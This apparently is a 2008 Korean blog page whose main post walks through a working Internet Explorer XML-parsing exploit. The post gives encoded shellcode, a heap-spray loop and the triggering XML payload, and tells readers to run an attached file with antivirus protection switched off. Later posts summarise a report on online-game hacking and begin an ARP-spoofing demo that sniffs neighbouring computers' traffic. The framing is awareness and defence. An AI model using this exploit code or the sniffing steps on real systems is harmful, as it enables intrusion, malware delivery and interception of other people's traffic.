var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

 

위에서 빨간부분에다가   악의적인 목적을 품은 해커가   원하는 공격명령을 집어넣을 수 있습니다.

현재  저 부분은   윈도우용 계산기가 실행되게끔 되어져 있습니다.

만약 저 부분에다가,

 

http://망할중국사이트/특정온라인게임악성코드.exe

 

이런식으로  코드를 넣으면 어떻게 될까요?

자세한것은  아래로 내려가면서 더 알수 있습니다.

 

 


var spray = unescape("%u0a0a%u0a0a");

do {
   spray += spray;
} while(spray.length < 0xd0000);

 

위  코드는   메모리상의  버퍼 오버플로우를 일으키기 위한  코드입니다.

 

spray라는 변수에  do while 문을 이용해서    \n\n 이라는 문자열을, 

총 길이가  0xd0000 (10진수로 53248) 이 될때까지 계속 집어넣고 있습니다.

 

오버플로우라는것을 여기서 말씀드리면 , 길어지니   네이버같은곳에서 검색해보시고,

간단히 설명드리자면 ,   너무 양이 많아서 넘친다는 의미입니다.

넘치고 흐른 다음에는   어떻게 될지 모릅니다.

 

 

 

memory = new Array();

 

for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;

 

memory 라는 변수를   배열로 초기화시키고 ,

배열의 요소요소에다가   spray라는 변수에 있던 코드와   shellcode라는 변수에 있던 코드를

집어넣고 있습니다.

 

즉 이렇게 되겠죠.

 

memory[0] = spray + shellcode;

memory[1] = spray + shellcode;

memory[2] = spray + shellcode;

.............

memory[98] = spray + shellcode;

memory[99] = spray + shellcode;

 

이 부분은  해커가 원하는 악의적인 코드를    컴퓨터의  메모리상에 일단   저장을 해두는 역할을 합니다.

 

 

 

 

xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

tag = document.getElementById("replace");
tag.innerHTML = xmlcode;

</script>
</html>

 

이 부분은  현재  마이크로소프트 인터넷 익스플로러 전 버젼에서 알려진

XML 파싱 에러 취약점으로 알려진 부분입니다.

저 XML 문법이 의미하는바가 뭔지  저도 자세히는 모릅니다만,

확실한것은  이 문법을  인터넷 익스프로러가 처리할때  프로그램 오류를 내뿜는데 , 그 순간에  취약점이 생기게 되어서,

 

위에 memory 라는 변수에  저장해두었던    spray + shellcode 가  자동적으로 실행되게 됩니다.

 

이때 ,   만약  shellcode에   아래와같이  특정온라인게임을 타겟으로 한  해킹프로그램을 다운로드 받을 수 있도록,

코드를 넣어두었다면 ,

 

예 : http://망할중국사이트/특정온라인게임악성코드.exe

 

 

이것이 자동적으로 다운로드받아지면서 실행이 되게 됩니다.

이때 ,  이  해킹프로그램이  현재 백신 데이터베이스에 존재하지 않는 신종  해킹프로그램이라면,

우리는 속수무책으로 당하게 됩니다.

 

 

 

 

이제  직접  그 공격을  체험할 수 있는 기회를 드리겠습니다.

이 체험을 하고나시면 , 해킹이란것이 이렇게 순식간에 일어나는 것이구나...라는것을 아실 수 있습니다.

 

물론 이것을 하고 안하고는    여러분들의 선택입니다.

확실한것은  , 절대!  시스템에  아무런 악영향을 끼치지 않으며 , 어떠한 해킹프로그램도 설치가 되지 않는다는 것입니다.

 

아래 전체 순서를   꼭  다 읽어보신뒤 !  ,  해보세요.

 

 

 

1. 첨부파일을 다운로드 합니다.

 



2. 모든  인터넷 익스플로러를   종료합니다.

 

3.   첨부파일을 압축을 푼뒤에 ,   Zeroday.html  파일을 실행합니다. 

(이때 , V3 , 바이러스 체이서 , 알약  , 카스퍼스키 , 네이버PC그린  등의    백신 프로그램  사용자는 백신에 감지가 될수 있습니다. 

공격 체험을 원하시면  실시간감시를 잠시 꺼놓은다음 ,  체험하고 나서 다시 켜시면 됩니다.)

 

4.   아래와 같은 화면이 뜨면 ,  노란색 줄을  누르고     " 차단된 콘텐츠 허용 "  을  누른뒤 ,  " 예  "  를 눌러줍니다.

 

 

 

5.  만약에    윈도우용 계산기가 실행되었다면 ,  아...나도  현재 이런 해킹공격에  노출될수가 있구나!  라고 생각하시면 됩니다.

즉 ,  윈도우용 계산기를 해킹프로그램이라고   생각하면 되겠죠.
찰나의 순간에 아마 실행되었을겁니다.
 

6.   작업관리자를 띄워서   프로세스 탭으로 가시면  iexplorer.exe    가 실행되고 있는데

그것을  "프로세스 종료"  해줍니다.

 

7.  다운로드 받은 파일은  살포시 지워줍니다.

 

 

 

********    소스코드 파일을   악의적인 목적으로 이용하는것을  절대  금합니다!!!  *******

 

 

 

 

 

그럼 이 글을 통해서 얻을 수 있는 결론은 이렇네요.

 

자신이   인터넷  웹서핑을  즐겁게 하고있다가,

 

위  소스코드가 심어져있는   홈페이지에 우연히 들어갔습니다.

자신도 모르게   스크립트 허용 버튼을  살포시 눌렀습니다.

 

그럼 인터넷 익스플로러가  갑자기 휙! 하면서   꺼집니다.

그리고 해킹프로그램이  쥐도새도모르게 실행됩니다.

 

그리곤 ,  엉엉 나 해킹당했어요.....ㅠㅠㅠㅠㅠㅠㅠ

이때와서   울어봤자 소용없겠죠?

 

그럼 예방법은?

 

이미 언론에서 보도되어진대로   신속히 절차를 이행하며 되겠지만,

가장 중요한것은     "  신뢰성 없는 사이트 "  에는 절대   접속하거나 , 접근하지말라!   라는 것입니다.

 물론 이 신뢰성이란것은  , 전적으로  여러분들의  주관적인 판단이 되겠죠.

 그리고 평소에  보안의식을 가지는것도  매우 중요합니다. ( 백신 + 보안패치 )

 

 

이상입니다.


잘못된 내용이 있다면  말씀해주세요.

저작자 표시 비영리 변경 금지
신고
by Sone 2008.12.16 17:37

http://www.microsoft.com/downloads/details.aspx?displaylang=ko&FamilyID=18045534-bf27-4953-b907-764c4682714c

저작자 표시 비영리 변경 금지
신고
by Sone 2008.12.05 14:23

* 이 글은 비단 테일즈위버 뿐만이 아닌 ,  모든 온라인게임에 해당되는 글임을 미리 밝힙니다. *

 

 

 

2006년

 

KISA( 한국정보보호진흥원 ) 에서는  온라인 게임 해킹 대응이란 주제로  문서파일을 배포했습니다.

이 문서에는  국내 온라인게임의 시장 현황, 서비스 구동방식 , 공격현황과 , 그에 따른 대응책 등이 서술되어 있습니다.

 

정독해본결과 , 최근현황과 크게 다르지 않다고 판단되어 ,

 

문서  내용 중 일부인 ,    온라인 게임 서비스 공격 현황에 대해서 글을 옮겨봅니다.

 

이 공격 현황이란 주제는

대부분 온라인게임에서 골칫거리로 문제되고 있는,

매크로, 프리서버,스피드핵,메모리 변조,패킷 변조, 계정 해킹 을  담고 있습니다.

 

총체적인 온라인게임에 대한 위협적인 문제들이 어떤것들이 있는지  모르시는분들은 

한번쯤 읽어보는것도 좋을것 같습니다.

 

 

 

 

 

 

 

온라인 게임의 공격 유형으로는 크게 서버 공격과 클라이언트 공격으로 나눌 수 있다.


서버 공격은 말 그대로의 서버 해킹을 의미한다.

웜, Dos공격, 패킷 리플라이 공격, 웹사이트 취약점 공격 등 악의적 목적을 갖고 서비스를 마비시키기 위하여 서버를 다운시키거 나, 소스 코드를 탈취하는 등의 부류가 이에 속한다.

 

클라이언트 공격은 자신의 PC에 설치된 클라이언트 파일에 대한 변조나 스피드핵 사용, 메모리 조작 등을 들 수 있다. 사용자들
이 흔히 표현하는“핵”이라는 용어가 이 클라이언트 해킹 범주에 들어가게 된다.

 

그렇다면, 서버 공격과 클라이언트 공격은 구체적으로 어떤 것들이 있는지 유형별로 살펴보기로 하겠다.

 

 

 

 

 

*  빨간색으로 표시를 해놓은것은 ,  골칫덩어리인 문제로 판단되어서, 따로  표시해놓았습니다.

 

그중 굵은 글씨로 표기해놓은 것은 , 더욱 심각한 문제입니다.

 

 

 제 개인적인 견해를  주석으로 밑에다가 달아놓았습니다.

 

 

 

 

목차

 

 

 

1. 서버 공격

-가. 게임 소스 탈취 (프리서버)

-나. Dos, 웜, 패킷 리플라이 공격 (서비스를 마비시키는 목적)

-다. 웹 사이트 취약점 (계정 해킹을 목적으로 시도함)

-라. Non Client BOT  (중국인 매크로에 해당)

 

2. 클라이언트 공격

-가. 스피드 핵의 원리

-나. 매크로 (오토마우스, USB스틱 등)

-다. 메모리 변조, 파일 변조 (아이템 능력치 변조,  게임 규칙을 위반하는 행동) - 주로 FPS 총게임이 표적

-라. 패킷 변조  (한방 핵의 원리, NON Client BOT , 매크로에 이용)

-마. 계정 해킹

 

 

1. 서버 공격

 

가. 게임 소스 탈취 (프리서버)


어떤 프로그램이든 그렇겠지만, 온라인 게임의 소스 코드 역시 보안에 보안을 거듭해도
모자라지 않을 만큼 중요한 것이다. 이 게임 소스를 탈취하면, 게임에 대한 정보를 모두 파
악할 수 있고, 똑같은 게임을 마음대로 서비스할 수도 있다. 우리나라의 온라인 게임은 국
제적으로도 상당한 수준이라, 해외로 수출하는 경우가 많은데, 대부분의 게임 소스는 이때
에 유출되곤 한다.
본 서버에 비해 상대적으로 보안에 허술한 테스트 서버 오픈 시에 이러한 소스 탈취의
위험도가 더 높게 되며, 해킹을 통해 유출된 소스로 인해 생겨나는 것들이 바로 프리서버
(Free Server)라는 불법 게임 서버이다. 프리서버의 발생은 곧 게임 서비스 질 저하로 이어
지게 된다.

 

> 주로 온라인 게임 프리서버와 관련된 문제입니다. 

대다수의 프리서버는  역시나 위에서 설명한대로,  게임 수출과정에  게임프로그래밍소스가 유출되어져서 생긴겁니다.

또다른 경우는 ,  초고수 해커가 , 클라이언트와 패킷의 내용을  모두  리버스엔지니어링 과정을 거쳐서,

완벽하게  재현한 경우가 있을수 있겠습니다.

 

 

나. Dos, 웜, 패킷 리플라이 공격 (서비스를 마비시키는 목적)


악의적 목적을 가지고 게임 서비스를 중단시키려는 경우가 이에 속한다. 게임 서비스에
불만을 갖고 혹은 해커의 실력을 과시하기 위해 서버를 공격하여 다운시킨 후 서비스를 할
수 없게 만드는 경우를 말한다. 서버 공격의 대표격인 Dos공격을 가하거나, 웜에 의한 무
차별 패킷 발송이 대표적인 경우이다.
이 같은 경우는 굳이 온라인 게임에서가 아닌 다른 해킹의 경우에도 비슷하지만, 온라인
게임의 특성과 좀더 직접적으로 연관된 부분도 없지 않다. 좀비 프로그램을 제작하여 무차
별로 로그인을 시도하는 패킷 리플라이 공격(로그인을 무한 시도하여 서버에 부하를 주는
방법) 등도 대표적인 사례로 볼 수 있다. 어쨌든 대부분 서버 과부하 또는 서버 다운을 의도
하여 행한 해킹으로, 게임 서비스 중지를 그 목적으로 한다. 중국에 게임을 수출하는 경우
“우리나라에 게임을 수출하지 마라”라며 해커가 게임 서버에 공격을 가한 경우도 있다.

 

> 이 문제는 잘 발생하지 않죠.  그냥 이런것이 있다  정도로만 알고있으면 될듯합니다.

 

 

 

다. 웹 사이트 취약점 (계정 해킹을 목적으로 시도함)


웹 사이트의 취약점을 이용하여, 서버에 해커가 원하는 악성 코드를 심어놓고, 그곳에
접속하는 사용자들에게 백도어나 바이러스 등을 감염시키는 해킹 유형이다.
반드시 게임
서버가 아닌 경우도 많으며, 관리가 허술하고 인터넷 사용자들의 접속이 빈번한 웹 사이트
가 주 공격대상이 되고 있다.

해커의 목적은 주로 백도어 감염을 통한 게임 계정 도용이다. 사이트에는 백도어를 심어
놓고, 사이트에 접속한 사용자들의 PC에 백도어가 설치되게 한다. 그 후 사용자가 입력한
게임 계정은 해커의 이메일로 전송된다. 최근 관리가 허술한 웹사이트를 찾아주는 SQL
Injection 자동화 툴이 해커들 사이에서 공유되고 있어 백도어 감염 웹사이트가 늘어나고
있다.

 

> 보통 대다수의 유저들이 생각하는 것중 하나가 ,  게임해킹은  로그인 할때만 조심하면 된다.  라고들 합니다.

허나 요즘은  강력한 기능을 가진  특정 게임을 타겟으로 하는   상식을 뛰어넘는 백도어들이 즐비하고 있습니다.

(가령,  로그인할때 ,  로그인 정보를 담은  패킷을  가로채거나 하는 경우가 있습니다.)

자신이 방문하는 사이트 중 하나가   웹 사이트 취약점에 의한  백도어 감염이 되어있는 사이트 일수도 있으니,

평소에 보안에 관심을 기울이고 ,  백신과 최신 보안패치를 설치하는 등  충분히 주의해야 합니다.

 

 

 

 

라. Non Client BOT  (중국인 매크로에 해당)


게임 클라이언트를 설치하지도 않고 게임을 실행하는 형태로 가장 골치 아픈 해킹 유형
중 하나이다.
게임의 패킷 구조를 완전히 분석한 해커가 프로그램을 개발하여 판매하는 형
태로, 그 프로그램만 실행하면 자동으로 서버에 접속하여 이동 패킷, 공격 패킷을 전송하며
사냥을 하게 된다. 게임 플레이를 하지도 않는 사용자들이 서버로 대량 접속하기 때문에 서
버 과부하가 생기는 것은 물론, 클라이언트에 아무리 보안 코드를 삽입해도 클라이언트 자
체가 실행되지 않으므로 무용지물인 해킹이다.
앞서 열거한 서버 공격과는 약간 성격이 다르며, 게임 서비스 중지를 목표로 하지는 않
지만, 해커 자신의 이익 추구 그리고 불법 플레이를 조장하는 온라인 게임 공격 형태 중의
하나이다.
다음은 게임 클라이언트 프로그램 없이 게임을 가동시킬 수 있는 프로그램의 화면으로,
이 프로그램을 이용하여 게임 서버에 무단으로 접속하여 캐릭터를 성장시키게 된다.

 

현재  대부분 중국발 매크로 공격의 방식이  모두  Non Client BOT 이라고 봐도  무방합니다.

클라이언트를 아예 실행하지 않고 , 봇 프로그램을 따로 구동시키기 때문에 ,  게임서비스 회사에서

이것을 막을수 있는 방법은  없습니다.  

이것은 국내에서 퍼질대로 퍼진  , 클라이언트를 실행시킨뒤 , USB스틱을 꽂고

키보드와 마우스 이벤트를 발생시켜서 자동으로 플레이시키는

오토마우스라던가  오토플레이 와는   차원이 다른 개념입니다.

 

이 BOT 프로그램은  컴퓨터 한대에   동일한 프로그램을 수십여개  실행시킨뒤,

프로그램별로  계정만 서로 다르게 입력하고 , 서버에 로그인 시킨다음 동작시키는 방식입니다.

 

컴퓨터 사양이 좋으면 , 컴퓨터 한대에   BOT 프로그램을 수백여개 넘게 구동시켜서,

컴퓨터 한대만 가지고도 ,  여러 서버 , 여러계정을  동시에 돌릴수 있습니다.

 

해커가  테일즈위버 게임의   서버와 클라이언트 사이를 오가는 패킷에 대한 정보를 완벽히 분석하고,

그것을 따로 프로그램으로 구현했기 때문에 , 전혀 차단시킬 방법이 없습니다.

중국발 IP를 차단시켜도 VPN우회나  프록시 등 여러 방법이 있기때문에 가장 골치아픈 문제로 대두되고 있습니다.

 

 

 

2. 클라이언트 공격

 

가. 스피드 핵의 원리

 

클라이언트 공격 유형 중의 가장 대표적이자, 해킹에 대해 아무것도 모르는 이들도 이름
은 들어봤음직한 해킹 유형이다. 본인 PC(클라이언트)의 시계를 빨리 간 것처럼 속여, 게임
내에서도 빠른 속도로 이동하게 만드는 핵이다. 스피드 핵은 크게 두 가지 종류가 있는데
8254 PIT(Programmable Interval Timer) 칩의 값을 조정하여 컴퓨터의 시계가 빠르게
흐르도록 하는 경우와 타이머 관련 API함수(GetTickCount(), timeGetTime() 등)를 후킹
(Hooking)하여 시간이 빨리 계산되도록 하는 가짜 API함수를 만든 후, 클라이언트에서 시
간을 계산할 때 그 함수를 이용하게 하는 방법이다. 공격 속도와 이동 속도가 빨라지므로
서버와 주고받는 패킷의 양도 당연히 늘어나게 된다. 따라서 이는 곧 서버 과부하의 문제로
이어질 수 있으며, 그와 더불어 공정한 게임 룰에도 지장을 가져오게 된다.

 

>  주로 인터넷에서 퍼질대로 퍼진 스피드핵의 유형은  PIT 칩의 값을 조정하여 ,  컴퓨터 시계가 전반적으로 빠르게 흘러가도록 하는 방법입니다.  이것은 대부분의 클라이언트에서  감지 루틴을 가지고 있기때문에 , 요즘에는 통하지 않는 방법이죠.

허나  클라이언트 시간에 관여하는 API를 후킹(가로챔) 한뒤 ,  가짜 API를 작성하여 ,   클라이언트에서  가짜API를 참조하도록 해버리면 ,  막을 방법이 없습니다.

 

 

 

나. 매크로 (오토마우스, USB스틱 등)


이른바“자동 사냥”이라 불리우는 클라이언트 해킹 유형으로, 역시 스피드 핵과 더불어
가장 널리 알려진 해킹에 속한다. “시작”버튼 하나만 누르면, 매크로가 알아서 몹을 발견
하고 공격해 주며, 체력이 떨어지면 자동으로 물약을 복용하는 등 아무런 조작 없이 켜 두
는 것만으로 레벨 업이 가능해지기 때문에 로봇 플레이 또는 BOT이라 불리우기도 한다.
매크로를 이용하여 게임 플레이를 하는 사용자가 많아지면, 당장의 동시 접속자 수는 증가
할지 몰라도, 게임을 직접 플레이 하지도 않으면서 계속적으로 서버와 패킷을 주고받는 유
령 접속자 때문에, 역시 서버 과부하의 문제로 이어질 수 있으며, 이는 곧 몹 사냥터 부족의
문제로까지 발전할 수 있다. 따라서 사용자들의 불만은 높아질 수밖에 없으며, 정상적으로
플레이를 하는 사용자들은 늘어난 매크로 사용자 때문에 게임을 그만두려 하는 경우도 있
다. 이처럼 매크로를 방치하면, 실 사용자 수는 줄어만 가는데, 정작 게임을 즐기지도 않는
거품 사용자들 때문에 오히려 서버를 늘려가야만 하는 아이러니한 사태에 봉착하여 게임
서비스 질 하락, 그리고 게임 서비스 중지라는 최악의 상황까지도 될 수 있다.

 

> Non Client BOT 보다는 수준이 낮지만 ,  역시나  골칫덩어리 중의 하나입니다.

보통 이런 부류의 매크로는  Non Client BOT 같이  패킷 분석방식의 봇이 아닌,

키보드와 마우스, 화면 픽셀의 값을 얻어오는 이벤트 등을 발생시켜서  자동으로 플레이 하는 방식입니다.

즉,  클라이언트를 실행시키고  매크로를 돌리는 방식이지요.

 

요즘에는 USB오토마우스가 많아졌는데,

이것을 방지하기 위해서 nProtect GameGuard 같은 안티 해킹 솔루션에서 

디바이스 드라이버 후킹까지 하고있지만, 지속적으로 업데이트 되면서 막기 어려운 실정입니다.

 

 

 

다. 메모리 변조, 파일 변조  (아이템 능력치 변조,  게임 규칙을 위반하는 행동) - 주로 FPS 총게임이 표적


주로 게임 클라이언트 프로세스의 메모리를 조작하는 해킹을 가리킨다. 메모리 변조는
크게 각종 데이터나 수치와 관련된 여러 값을 처리하는 데이터 영역과, 게임의 내부 구현
루틴 즉, 코드 영역 부분으로 나눌 수 있다.

 

먼저 데이터를 조작하는 경우를 살펴보겠다.
현재 게임 외부에서 보이는 HP, 아이템, 레벨, 경험치, 돈 등 모든 수치는 다 메모리에
적용되어 있다. 따라서 메모리에 기록된 값이 어떤 부분인지만 알아내면, 그 부분을 바꿔버
림으로써 순식간에 속임(Cheat)이 가능해지게 된다. 물론 대부분의 온라인 게임에서 클라
이언트 PC에 저장되는 메모리 값은, 서버에서 처리한 내용을 보여주는 용도 정도로만 사
용하고 있다. 따라서 그런 경우는 클라이언트에서 아무리 값을 고쳐 봤자, 자신의 PC에서
만 고쳐진 값이“보여질”뿐이므로 그다지 문제될 것이 없다.


하지만, 일부 게임에선 게임의 구조상, 그리고 서버에서의 오버헤드를 최소한으로 줄이
기 위하여 클라이언트의 데이터를 신뢰하여 그대로 게임에 적용하기도 한다. 이런 경우 메
모리 변조가 크게 문제가 된다. 경험치를 배로 올려주게 한다거나, 아이템을 획득했을 때
어떠한 번지에 어떤 값이 기록되는 부분을 변조하여 무한대로 아이템이 얻어지는, 아이템
복사 핵으로까지 발전할 수 있다.


다음은 코드 영역을 고치는 부분인데, 이 부분은 데이터 영역 변조보다 그 피해도가 훨
씬 심각하며 가장 직접적인 클라이언트 공격에 속한다. 게임 개발자가 게임의 룰을 유지하
기 위하여 작성한 코드를 무력화 시키거나, 자신이 원하는 대로 코드를 바꿀 수도 있다. 예
를 들어 보안 코드를 NOP시켜 해당 루틴이 실행되지 않게 하는 일이 가능해진다. 밤낮이
변하는 부분을 무력화 하여 계속 낮처럼 보이게 할 수도 있고, 통행로가 아닌 부분에 억지
로 캐릭터가 지나다니게 할 수도 있다. 이 같은 코드 영역의 변조는 메모리에 올라간 후에
변조시킬 수도, 파일 상태에서 미리 변조시킨 후 실행하는 방법도 있다. 후자의 경우를 방
지하기 위하여 클라이언트 실행파일을 프로텍터 등으로 암호화(Packing)하기도 하지만,
언패커(Unpacker)가 공개되며 암호화를 풀어낸 뒤 다시 변조하는 경우도 적지 않다.
이런 식의 메모리 변조는 일반적인 프로그래밍은 물론, 어셈블리어의 역분석에 까지도
능한 초 고수급 해커들이 사용하는 방법이기 때문에 사용할 수 있는 곳은 무궁무진하다. 자
신을 분석해 내는 보안 코드를 뛰어넘게 만들거나 아예 보안 프로그램이 실행되지 않게 만
들어 버릴 수도 있다. 중국의 핵툴 제작업체에선 이런 게임 클라이언트 분석을 통한 메모
리, 파일 변조 해킹이 능수능란하게 이루어지고 있다.

 

> 간단히 요약하자면 ,

 현재 우리가 게임을 하면서 눈에 보이는것들, 

 아이템에 대한 정보라던가 HP,MP,SP , 경험치  이런것들은  그 기록들이 다 서버에 있기때문에 조작할수 없습니다.

 

하지만 , 일부 자금난에 허덕이거나 하는 게임회사들은  서버유지비용을 최대한 줄이기 위해서,

서버에 그런것들을 구현시키지 않고 ,   클라이언트 실행파일에  HP,MP,SP 같은 정보를 기록시키는 경우도 있습니다.

이럴 경우 ,  치트엔진 같은 프로그램으로 그 값을 검색한뒤 , 변경해줌으로써  

절대 죽지 않는 무적기능 , 매우 강력한  아이템 같은 것들을 구현해낼 수 있습니다.

또한   HACK 1당 공격력 , AGI 1당 회피율 , 딜레이 계산 공식,  스킬 공격력 % 비율 등을 조작할 수 있습니다.

 

그리고  게임의 규칙을 담고있는  코드를 변경하는것은, 클라이언트 공격중 가장 위협적인 공격이라고 생각됩니다.

이 규칙을 바꾸게 되면 ,  공격 딜레이 조작이라던가 ,  밤낮 시간변경 같은것들을 할수 있습니다.

 

보통 게임의 규칙을 담고있는   클라이언트 실행파일은    무단 변경을 막기위해 ,

Packing(암호화) 를 해놓지만 ,   리버스엔지니어링에 능한  해커는  이것을  Unpacking(복호화) 함으로써,

무단으로 게임의 규칙을 바꿉니다. 

 

또한 우리가 게임을 실행할때는 , 게임 데이터들이 메모리 상에 올라가게 되는데,

이것을 메모리 조작 프로그램으로 값을 변경해서 고칠수도 있습니다.

 보통  nProtect GameGuard 나     Xtrap ,   핵쉴드  같은   안티 해킹 솔루션에 의해서 막히지만,

제가   게임가드를   없애버리는 동영상을  보신분들이라면 , 이마저도 쉽게 뚫리는것을 알수 있습니다.

또한  안티해킹솔루션이  실행되고 있어도 ,  그것을 우회하는  메모리 조작 프로그램들이  넘쳐나기 때문에,

항상 위협적인 요소입니다.

 

 

 

라. 패킷 변조  (한방 핵의 원리, NON Client BOT , 매크로에 이용)


게임 클라이언트와 게임 서버가 주고받는 네트워크 패킷을 분석하고 조작하는 해킹 유
형이다. 클라이언트에서는 사용자가 플레이한 내용으로 패킷을 만들어 서버로 날리는데,
이때 이 패킷을 캡쳐하여 중간에서 조작, 몇 배의 수치로 늘려 보낸다면 이것이 곧 패킷 해
킹이 되는 것이다.

몹에게 히트를 한방 먹이면 1이라는 패킷이 전달된다고 가정했을 때,

이때 전송되는 이 1값이 포함된 패킷을 중간에서 가로채 100이라고 바꾸면 백 배의 공력으로
바뀌어 전달되어 어떤 몹이라도 한번에 잡을 수 있게 된다.

여기서 패킷을 암호화하거나,서버에서 패킷 체크를 함으로써 네트워크 상에서 값을 조작하여 전달하는 것이 불가능할
경우, 그냥 캡춰한 값을 조작하지 않고 보내되, 같은 값을 계속적으로 여러 번 보내는 작업
을 한다면 한 방 먹였을 때 수 십방 먹인 것과 같은 효과가 발생되어 역시 같은 효과를 낼
수 있다. 이것이 곧 한방에 적을 물리칠 수 있는 한방핵의 원리이다.

패킷은 단지 공격 값의 경우에만 제한된 요소가 아닌 다양한 값에 대한 처리를 하고 있기 때문에,

현재 몹의 위치를 파악하거나 자신의 체력 상태 등의 체크도 가능하다.

따라서 패킷을 검사해 어떤 방향에 적이 있는지를 파악하고 그쪽으로 자동으로 이동하는 등 오토
마우스와 더불어 사용되기도 한다. 이정도 수준까지 구현하는 핵툴은 상당한 고수준의
BOT이며 중국, 대만 등에서 유료 핵툴을 제작하여 판매하는 경우가 대부분으로 개별 게임
사에서 일일이 대응하기도 힘든 부분 중의 하나이다.

 

> 예를 들어서 보리스가 붉은달의맹약 스킬을 쓴다고 칩시다.

맹약을 시전함과 동시에 ,  클라이언트 실행파일은  맹약과 관련된 패킷을  게임서버로 보내게 됩니다.

이 패킷에는  맹약을 쓸때   MP,SP,환경마나   같은것들이 얼마만큼 깎이는가, 상태이상은 어떤것인가라는

내용을  내포하고 있습니다.

이 패킷을 가로채어서 , 분석한뒤   MP,SP,상태이상  관련 내용을 조작하게 되면

 맹약을 써도 SP가 깎이지 않거나,  MP 등이  깎이지 않게 할수 있습니다.

 

단 ,  서버에서  패킷의  고유 값을 검사하는 기능을 가지고 있다면 ,  이것은 불가능해지게 됩니다.

 

또다르게는  Non Client BOT을 만들때  위 방법이 쓰이기도 합니다.

 

 

 

 

마. 계정 해킹

 

온라인 게임에서 가장 중요한 계정을 훔쳐가는 해킹이다. 다른 게임 클라이언트 해킹 유
형 중에, 사용자들이 가장 직접적으로 피해를 입는 부분이므로, 대중적으로는 이러한 것이
일반적으로 해킹이라고 알려져 있다. 계정을 빼앗아가는 방법에도 매우 다양한 기술이 있
으나, 대부분은 최신 백신 설치와 윈도우 보안 패치로 예방이 가능하다.
하지만 그것마저
제대로 설치해 놓고 있지 않은 사용자들이나, 타인에게 속아 무심코 계정 정보를 알려주는
게이머들이 흔히 당하는 해킹 중의 하나이다.
계정을 해킹할 수 있는 방법에도 굉장히 많은
형태가 있으며, 점차 다양화∙기술화되고 있다.

 

>  백신 설치에도  신중을 기해야 합니다.   특정 백신 이름을 언급하지는 않겠습니다만,

일부 백신의 경우 ,   변종 해킹 프로그램이나   바이러스에  매우 취약한 성능을 가지고 있습니다.

따라서 변종에 강한 ,  인지도가 높은 백신을 이용하시길 강력 권장드립니다.

 

 

 

 

 

 

위  내용은   KISA에서   온라인 게임 해킹에 대한 주제로 배포한  문서파일에서 발췌해왔음을 밝힙니다.

 

 

 

 

PS.  참고로 테일즈위버 내에서 NON Client BOT 매크로임을 알아볼수 있는 방법은

 

어떤 캐릭터가  계속적으로   어떤 위치에서 눈에 보이지도 않는  저 멀리 있는 몹을 공격한다거나 ,

계속적으로 위치렉처럼  특정위치로 워프하는것처럼  바로 이동하는것으로  알아볼 수 있습니다.

저작자 표시 비영리 변경 금지
신고
by Sone 2008.11.30 20:23

http://www.playwares.com/bbs/zboard.php?id=user&no=203

 

 

인텔 코어2듀오 , 코어2쿼드  다음으로  완전히 새로운 방식으로 나오는 CPU

 

' 인텔 코어 i7 '   CPU 입니다.

 

정품공냉방식에서   3.7Ghz 까지  무난히 오버가 가능하다면 ,

사제공냉이나 ,  수냉에서는 4Ghz는 거뜬하리라 예상되고,

 

위 사이트에서 본것 중  'RAM - 트리플채널 DDR3  6GB' 가 상당히 인상적이었구요..

AMD 처럼  CPU내부에   RAM컨트롤러가 탑재되어 있어서 ,  엄청난  레이턴시 응답속도를 보여주는것도 인상적...

레이턴시 ns 속도는 수치가 낮을수록 빠른것입니다.

 

또한 ASUS P6T Deluxe에 포함되어있는  ASUS Palm ...........할말이 없는듯 ㅋㅋ

관심있으신분은 위 사이트로 가셔서  읽어보시면   네할렘의 포스를 느낄수가 있씁니다.

 

참고로    LGA1366의  인텔 X58 칩셋은     하이엔드급 코어 i7을 위해서 출시된 칩셋이며

메인스트림급  코어 i7은  LGA1366으로 나오지 않고  ,  LGA1160 방식의  인텔 P55 칩셋으로 나올 예정입니다.

 

내년 후반기에 업그레이드를 고려하실분은  머리를 좀 쥐어짜야겠군요.

 

 일단  총알장전부터?

저작자 표시 비영리 변경 금지
신고
by Sone 2008.11.30 20:21

ARP스푸핑 공격이 한때 이슈가 되었었죠~
자신과 동일 선상에 있는 모든 네트워크를 공격할수 있다고 하는데..

 

간단히 말해서 ,  자기와 가까이 사는 옆동네의 컴퓨터를 공격할 수 있다는 말입니다.



공격유형에는 여러가지가 있겠지만,   (동일 네트워크 선상에 트로이목마 전파 ,  패킷캡쳐 등)


오늘은 그중 한가지인  ,   ARP스푸핑을 통한  패킷캡쳐를 해봤스빈다.












자신과 동일 네트워크 선상에 있는 네트워크 IP들을 스캔합니다.
(예 :  111.111.111.1  ~  111.111.111.255)


간략하게 어떤 컴퓨터를 쓰는지도 표시해줍니다.
스샷을 간단히 보니깐.........우리 옆동네 사람들 중,

 ECS메인보드를 쓰는 컴퓨터도 보이고......삼성컴푸타도 보이고.......ASUSTek 메인보드를 쓰는 조립 컴푸타도 보이네요.












스캔된 컴퓨터중 ,  공격을 시도할  컴퓨터의 IP를 선택해주고 ,   그 네트워크의 게이트웨이를 선택해줍니다.
클라이언트와  , 게이트웨이 간에 패킷이 오가는것을 캡쳐하기 위해서죠.

 

즉,  자신이 인터넷의 링크를 하나 클릭하는 순간에,  자기 컴퓨터에서  인터넷서비스제공업체의  서버로 패킷이 전송되게 되는데,

이것을 따내는 겁니다.

뭐 물론 받아오는 정보도 볼수 있죠.

 


그냥 간단히 말해서 다른 사람이 인터넷으로 뭐하는지 전부다 다 볼수있다  이거입니다..











공격할 컴퓨터를 선택한뒤 ,  패킷 스니핑을 시작합니다..
